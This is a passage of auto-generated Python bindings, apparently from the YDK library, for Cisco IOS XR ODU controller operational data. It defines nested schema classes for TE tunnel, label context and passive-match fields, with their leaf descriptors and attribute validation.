        # Maps python attribute name -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('gmpls_req_time', (YLeaf(YType.uint32, 'gmpls-req-time'), ['int'])),
            ('ctxt_type', (YLeaf(YType.enumeration, 'ctxt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxt', '')])),
            ('rm_type', (YLeaf(YType.enumeration, 'rm-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxtRm', '')])),
        ])
        # Leaf values start unset; assignments go through __setattr__ below.
        self.gmpls_req_time = None
        self.ctxt_type = None
        self.rm_type = None
        # Child container is instantiated eagerly and parented to this node.
        self.te_tunnel_info = Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo()
        self.te_tunnel_info.parent = self
        self._children_name_map["te_tunnel_info"] = "te-tunnel-info"
        self._segment_path = lambda: "te-ctx-data"
        # NOTE(review): freezing appears to be required as the LAST statement of
        # __init__ -- _perform_setattr (in _Entity_, outside this file) presumably
        # gates attribute writes on _is_frozen; confirm against _Entity_.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all attribute writes through the base-class validator, which
        # restricts them to the declared leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData, ['gmpls_req_time', 'ctxt_type', 'rm_type'], name, value)


    class TeTunnelInfo(_Entity_):
        """
        Tunnel Information
        .. attribute:: lb_ctxt
        Lbl Ctxt
        **type**\: :py:class:`LbCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt>`
        **config**\: False
        .. attribute:: passive_match
        Passive Match
        **type**\: :py:class:`PassiveMatch <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch>`
        **config**\: False
        .. attribute:: info_type
        INFO TYPE
        **type**\: :py:class:`OtmTeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmTeTunnelInfo>`
        **config**\: False
        .. attribute:: tunnel_id
        Tunnel Id
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        """

        _prefix = 'controller-odu-oper'
        _revision = '2015-11-09'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo, self).__init__()
            self.yang_name = "te-tunnel-info"
            self.yang_parent_name = "te-ctx-data"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Two child containers: LbCtxt and PassiveMatch, both defined below.
            self._child_classes = OrderedDict([("lb-ctxt", ("lb_ctxt", Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt)), ("passive-match", ("passive_match", Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch))])
            self._leafs = OrderedDict([
                ('info_type', (YLeaf(YType.enumeration, 'info-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmTeTunnelInfo', '')])),
                ('tunnel_id', (YLeaf(YType.uint32, 'tunnel-id'), ['int'])),
            ])
            self.info_type = None
            self.tunnel_id = None
            # Child containers are instantiated eagerly and parented to this node.
            self.lb_ctxt = Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt()
            self.lb_ctxt.parent = self
            self._children_name_map["lb_ctxt"] = "lb-ctxt"
            self.passive_match = Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch()
            self.passive_match.parent = self
            self._children_name_map["passive_match"] = "passive-match"
            self._segment_path = lambda: "te-tunnel-info"
            # Must remain the last statement (see note on the outer class).
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo, ['info_type', 'tunnel_id'], name, value)


        class LbCtxt(_Entity_):
            """
            Lbl Ctxt
            .. attribute:: s2l_fec_sub_group_id
            SubGroup Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: s2l_fec_lsp_id
            Lsp Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: s2l_fec_tunnel_id
            Tunnel Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: ext_tunnel_id
            Ext Tunnel Id
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_source
            FEC Source
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_dest
            FEC Dest
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: s2l_fec_p2mp_id
            P2MP Id
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: sub_group_origin_ator
            SubGroup Originator
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_c_type
            Ctype
            **type**\: :py:class:`OtmMplsLibC <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmMplsLibC>`
            **config**\: False
            """

            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt, self).__init__()
                self.yang_name = "lb-ctxt"
                self.yang_parent_name = "te-tunnel-info"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                self._leafs = OrderedDict([
                    ('s2l_fec_sub_group_id', (YLeaf(YType.uint16, 's2l-fec-sub-group-id'), ['int'])),
                    ('s2l_fec_lsp_id', (YLeaf(YType.uint16, 's2l-fec-lsp-id'), ['int'])),
                    ('s2l_fec_tunnel_id', (YLeaf(YType.uint16, 's2l-fec-tunnel-id'), ['int'])),
                    ('ext_tunnel_id', (YLeaf(YType.uint32, 'ext-tunnel-id'), ['int'])),
                    ('fec_source', (YLeaf(YType.uint32, 'fec-source'), ['int'])),
                    ('fec_dest', (YLeaf(YType.uint32, 'fec-dest'), ['int'])),
                    ('s2l_fec_p2mp_id', (YLeaf(YType.uint32, 's2l-fec-p2mp-id'), ['int'])),
                    ('sub_group_origin_ator', (YLeaf(YType.uint32, 'sub-group-origin-ator'), ['int'])),
                    ('fec_c_type', (YLeaf(YType.enumeration, 'fec-c-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmMplsLibC', '')])),
                ])
                self.s2l_fec_sub_group_id = None
                self.s2l_fec_lsp_id = None
                self.s2l_fec_tunnel_id = None
                self.ext_tunnel_id = None
                self.fec_source = None
                self.fec_dest = None
                self.s2l_fec_p2mp_id = None
                self.sub_group_origin_ator = None
                self.fec_c_type = None
                self._segment_path = lambda: "lb-ctxt"
                # Must remain the last statement (see note on the outer class).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt, ['s2l_fec_sub_group_id', 's2l_fec_lsp_id', 's2l_fec_tunnel_id', 'ext_tunnel_id', 'fec_source', 'fec_dest', 's2l_fec_p2mp_id', 'sub_group_origin_ator', 'fec_c_type'], name, value)

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.LbCtxt']['meta_info']


        class PassiveMatch(_Entity_):
            """
            Passive Match
            .. attribute:: src_tid
            Src TId
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: src_rid
            Src RId
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            """

            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch, self).__init__()
                self.yang_name = "passive-match"
                self.yang_parent_name = "te-tunnel-info"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                self._leafs = OrderedDict([
                    ('src_tid', (YLeaf(YType.uint16, 'src-tid'), ['int'])),
                    ('src_rid', (YLeaf(YType.uint32, 'src-rid'), ['int'])),
                ])
                self.src_tid = None
                self.src_rid = None
                self._segment_path = lambda: "passive-match"
                # Must remain the last statement (see note on the outer class).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch, ['src_tid', 'src_rid'], name, value)

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo.PassiveMatch']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
            return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo']['meta_info']

    @staticmethod
    def _meta_info():
        # Meta information is kept in a generated side table, imported lazily.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.TeCtxData']['meta_info']
class XcAddCtxData(_Entity_):
    """
    Xconnect Add Data
    .. attribute:: te_tunnel_info
    Tunnel Information
    **type**\: :py:class:`TeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo>`
    **config**\: False
    .. attribute:: gmpls_req_time
    Req Time
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: ctxt_type
    Ctxt Type
    **type**\: :py:class:`OtmOpticalRmCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxt>`
    **config**\: False
    .. attribute:: rm_type
    Rm Type
    **type**\: :py:class:`OtmOpticalRmCtxtRm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxtRm>`
    **config**\: False
    """

    # YANG module identity for this schema node.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3-compatible super() call (this generated module supports both).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.XcAddCtxData, self).__init__()
        # Schema bookkeeping: YANG names and position of this node in the tree.
        self.yang_name = "xc-add-ctx-data"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child container: the nested TeTunnelInfo class defined below.
        self._child_classes = OrderedDict([("te-tunnel-info", ("te_tunnel_info", Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo))])
        # Maps python attribute name -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('gmpls_req_time', (YLeaf(YType.uint32, 'gmpls-req-time'), ['int'])),
            ('ctxt_type', (YLeaf(YType.enumeration, 'ctxt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxt', '')])),
            ('rm_type', (YLeaf(YType.enumeration, 'rm-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxtRm', '')])),
        ])
        # Leaf values start unset; assignments go through __setattr__ below.
        self.gmpls_req_time = None
        self.ctxt_type = None
        self.rm_type = None
        # Child container is instantiated eagerly and parented to this node.
        self.te_tunnel_info = Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo()
        self.te_tunnel_info.parent = self
        self._children_name_map["te_tunnel_info"] = "te-tunnel-info"
        self._segment_path = lambda: "xc-add-ctx-data"
        # NOTE(review): freezing appears to be required as the LAST statement of
        # __init__ -- _perform_setattr (in _Entity_, outside this file) presumably
        # gates attribute writes on _is_frozen; confirm against _Entity_.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all attribute writes through the base-class validator, which
        # restricts them to the declared leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData, ['gmpls_req_time', 'ctxt_type', 'rm_type'], name, value)


    class TeTunnelInfo(_Entity_):
        """
        Tunnel Information
        .. attribute:: lb_ctxt
        Lbl Ctxt
        **type**\: :py:class:`LbCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt>`
        **config**\: False
        .. attribute:: passive_match
        Passive Match
        **type**\: :py:class:`PassiveMatch <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch>`
        **config**\: False
        .. attribute:: info_type
        INFO TYPE
        **type**\: :py:class:`OtmTeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmTeTunnelInfo>`
        **config**\: False
        .. attribute:: tunnel_id
        Tunnel Id
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        """

        _prefix = 'controller-odu-oper'
        _revision = '2015-11-09'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo, self).__init__()
            self.yang_name = "te-tunnel-info"
            self.yang_parent_name = "xc-add-ctx-data"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Two child containers: LbCtxt and PassiveMatch, both defined below.
            self._child_classes = OrderedDict([("lb-ctxt", ("lb_ctxt", Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt)), ("passive-match", ("passive_match", Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch))])
            self._leafs = OrderedDict([
                ('info_type', (YLeaf(YType.enumeration, 'info-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmTeTunnelInfo', '')])),
                ('tunnel_id', (YLeaf(YType.uint32, 'tunnel-id'), ['int'])),
            ])
            self.info_type = None
            self.tunnel_id = None
            # Child containers are instantiated eagerly and parented to this node.
            self.lb_ctxt = Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt()
            self.lb_ctxt.parent = self
            self._children_name_map["lb_ctxt"] = "lb-ctxt"
            self.passive_match = Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch()
            self.passive_match.parent = self
            self._children_name_map["passive_match"] = "passive-match"
            self._segment_path = lambda: "te-tunnel-info"
            # Must remain the last statement (see note on the outer class).
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo, ['info_type', 'tunnel_id'], name, value)


        class LbCtxt(_Entity_):
            """
            Lbl Ctxt
            .. attribute:: s2l_fec_sub_group_id
            SubGroup Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: s2l_fec_lsp_id
            Lsp Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: s2l_fec_tunnel_id
            Tunnel Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: ext_tunnel_id
            Ext Tunnel Id
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_source
            FEC Source
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_dest
            FEC Dest
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: s2l_fec_p2mp_id
            P2MP Id
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: sub_group_origin_ator
            SubGroup Originator
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_c_type
            Ctype
            **type**\: :py:class:`OtmMplsLibC <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmMplsLibC>`
            **config**\: False
            """

            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt, self).__init__()
                self.yang_name = "lb-ctxt"
                self.yang_parent_name = "te-tunnel-info"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                self._leafs = OrderedDict([
                    ('s2l_fec_sub_group_id', (YLeaf(YType.uint16, 's2l-fec-sub-group-id'), ['int'])),
                    ('s2l_fec_lsp_id', (YLeaf(YType.uint16, 's2l-fec-lsp-id'), ['int'])),
                    ('s2l_fec_tunnel_id', (YLeaf(YType.uint16, 's2l-fec-tunnel-id'), ['int'])),
                    ('ext_tunnel_id', (YLeaf(YType.uint32, 'ext-tunnel-id'), ['int'])),
                    ('fec_source', (YLeaf(YType.uint32, 'fec-source'), ['int'])),
                    ('fec_dest', (YLeaf(YType.uint32, 'fec-dest'), ['int'])),
                    ('s2l_fec_p2mp_id', (YLeaf(YType.uint32, 's2l-fec-p2mp-id'), ['int'])),
                    ('sub_group_origin_ator', (YLeaf(YType.uint32, 'sub-group-origin-ator'), ['int'])),
                    ('fec_c_type', (YLeaf(YType.enumeration, 'fec-c-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmMplsLibC', '')])),
                ])
                self.s2l_fec_sub_group_id = None
                self.s2l_fec_lsp_id = None
                self.s2l_fec_tunnel_id = None
                self.ext_tunnel_id = None
                self.fec_source = None
                self.fec_dest = None
                self.s2l_fec_p2mp_id = None
                self.sub_group_origin_ator = None
                self.fec_c_type = None
                self._segment_path = lambda: "lb-ctxt"
                # Must remain the last statement (see note on the outer class).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt, ['s2l_fec_sub_group_id', 's2l_fec_lsp_id', 's2l_fec_tunnel_id', 'ext_tunnel_id', 'fec_source', 'fec_dest', 's2l_fec_p2mp_id', 'sub_group_origin_ator', 'fec_c_type'], name, value)

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.LbCtxt']['meta_info']


        class PassiveMatch(_Entity_):
            """
            Passive Match
            .. attribute:: src_tid
            Src TId
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: src_rid
            Src RId
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            """

            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch, self).__init__()
                self.yang_name = "passive-match"
                self.yang_parent_name = "te-tunnel-info"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                self._leafs = OrderedDict([
                    ('src_tid', (YLeaf(YType.uint16, 'src-tid'), ['int'])),
                    ('src_rid', (YLeaf(YType.uint32, 'src-rid'), ['int'])),
                ])
                self.src_tid = None
                self.src_rid = None
                self._segment_path = lambda: "passive-match"
                # Must remain the last statement (see note on the outer class).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch, ['src_tid', 'src_rid'], name, value)

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo.PassiveMatch']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
            return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData.TeTunnelInfo']['meta_info']

    @staticmethod
    def _meta_info():
        # Meta information is kept in a generated side table, imported lazily.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.XcAddCtxData']['meta_info']
class XcRemCtxData(_Entity_):
    """
    Xconnect Remove Data
    .. attribute:: te_tunnel_info
    Tunnel Information
    **type**\: :py:class:`TeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo>`
    **config**\: False
    .. attribute:: gmpls_req_time
    Req Time
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: ctxt_type
    Ctxt Type
    **type**\: :py:class:`OtmOpticalRmCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxt>`
    **config**\: False
    .. attribute:: rm_type
    Rm Type
    **type**\: :py:class:`OtmOpticalRmCtxtRm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxtRm>`
    **config**\: False
    """

    # YANG module identity for this schema node.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3-compatible super() call (this generated module supports both).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.XcRemCtxData, self).__init__()
        # Schema bookkeeping: YANG names and position of this node in the tree.
        self.yang_name = "xc-rem-ctx-data"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child container: the nested TeTunnelInfo class defined below.
        self._child_classes = OrderedDict([("te-tunnel-info", ("te_tunnel_info", Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo))])
        # Maps python attribute name -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('gmpls_req_time', (YLeaf(YType.uint32, 'gmpls-req-time'), ['int'])),
            ('ctxt_type', (YLeaf(YType.enumeration, 'ctxt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxt', '')])),
            ('rm_type', (YLeaf(YType.enumeration, 'rm-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmOpticalRmCtxtRm', '')])),
        ])
        # Leaf values start unset; assignments go through __setattr__ below.
        self.gmpls_req_time = None
        self.ctxt_type = None
        self.rm_type = None
        # Child container is instantiated eagerly and parented to this node.
        self.te_tunnel_info = Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo()
        self.te_tunnel_info.parent = self
        self._children_name_map["te_tunnel_info"] = "te-tunnel-info"
        self._segment_path = lambda: "xc-rem-ctx-data"
        # NOTE(review): freezing appears to be required as the LAST statement of
        # __init__ -- _perform_setattr (in _Entity_, outside this file) presumably
        # gates attribute writes on _is_frozen; confirm against _Entity_.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all attribute writes through the base-class validator, which
        # restricts them to the declared leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData, ['gmpls_req_time', 'ctxt_type', 'rm_type'], name, value)


    class TeTunnelInfo(_Entity_):
        """
        Tunnel Information
        .. attribute:: lb_ctxt
        Lbl Ctxt
        **type**\: :py:class:`LbCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt>`
        **config**\: False
        .. attribute:: passive_match
        Passive Match
        **type**\: :py:class:`PassiveMatch <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch>`
        **config**\: False
        .. attribute:: info_type
        INFO TYPE
        **type**\: :py:class:`OtmTeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmTeTunnelInfo>`
        **config**\: False
        .. attribute:: tunnel_id
        Tunnel Id
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        """

        _prefix = 'controller-odu-oper'
        _revision = '2015-11-09'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo, self).__init__()
            self.yang_name = "te-tunnel-info"
            self.yang_parent_name = "xc-rem-ctx-data"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Two child containers: LbCtxt and PassiveMatch, both defined below.
            self._child_classes = OrderedDict([("lb-ctxt", ("lb_ctxt", Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt)), ("passive-match", ("passive_match", Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch))])
            self._leafs = OrderedDict([
                ('info_type', (YLeaf(YType.enumeration, 'info-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmTeTunnelInfo', '')])),
                ('tunnel_id', (YLeaf(YType.uint32, 'tunnel-id'), ['int'])),
            ])
            self.info_type = None
            self.tunnel_id = None
            # Child containers are instantiated eagerly and parented to this node.
            self.lb_ctxt = Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt()
            self.lb_ctxt.parent = self
            self._children_name_map["lb_ctxt"] = "lb-ctxt"
            self.passive_match = Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch()
            self.passive_match.parent = self
            self._children_name_map["passive_match"] = "passive-match"
            self._segment_path = lambda: "te-tunnel-info"
            # Must remain the last statement (see note on the outer class).
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo, ['info_type', 'tunnel_id'], name, value)


        class LbCtxt(_Entity_):
            """
            Lbl Ctxt
            .. attribute:: s2l_fec_sub_group_id
            SubGroup Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: s2l_fec_lsp_id
            Lsp Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: s2l_fec_tunnel_id
            Tunnel Id
            **type**\: int
            **range:** 0..65535
            **config**\: False
            .. attribute:: ext_tunnel_id
            Ext Tunnel Id
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_source
            FEC Source
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_dest
            FEC Dest
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: s2l_fec_p2mp_id
            P2MP Id
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: sub_group_origin_ator
            SubGroup Originator
            **type**\: int
            **range:** 0..4294967295
            **config**\: False
            .. attribute:: fec_c_type
            Ctype
            **type**\: :py:class:`OtmMplsLibC <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmMplsLibC>`
            **config**\: False
            """

            _prefix = 'controller-odu-oper'
            _revision = '2015-11-09'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt, self).__init__()
                self.yang_name = "lb-ctxt"
                self.yang_parent_name = "te-tunnel-info"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                self._leafs = OrderedDict([
                    ('s2l_fec_sub_group_id', (YLeaf(YType.uint16, 's2l-fec-sub-group-id'), ['int'])),
                    ('s2l_fec_lsp_id', (YLeaf(YType.uint16, 's2l-fec-lsp-id'), ['int'])),
                    ('s2l_fec_tunnel_id', (YLeaf(YType.uint16, 's2l-fec-tunnel-id'), ['int'])),
                    ('ext_tunnel_id', (YLeaf(YType.uint32, 'ext-tunnel-id'), ['int'])),
                    ('fec_source', (YLeaf(YType.uint32, 'fec-source'), ['int'])),
                    ('fec_dest', (YLeaf(YType.uint32, 'fec-dest'), ['int'])),
                    ('s2l_fec_p2mp_id', (YLeaf(YType.uint32, 's2l-fec-p2mp-id'), ['int'])),
                    ('sub_group_origin_ator', (YLeaf(YType.uint32, 'sub-group-origin-ator'), ['int'])),
                    ('fec_c_type', (YLeaf(YType.enumeration, 'fec-c-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmMplsLibC', '')])),
                ])
                self.s2l_fec_sub_group_id = None
                self.s2l_fec_lsp_id = None
                self.s2l_fec_tunnel_id = None
                self.ext_tunnel_id = None
                self.fec_source = None
                self.fec_dest = None
                self.s2l_fec_p2mp_id = None
                self.sub_group_origin_ator = None
                self.fec_c_type = None
                self._segment_path = lambda: "lb-ctxt"
                # Must remain the last statement (see note on the outer class).
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt, ['s2l_fec_sub_group_id', 's2l_fec_lsp_id', 's2l_fec_tunnel_id', 'ext_tunnel_id', 'fec_source', 'fec_dest', 's2l_fec_p2mp_id', 'sub_group_origin_ator', 'fec_c_type'], name, value)

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
                return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt']['meta_info']


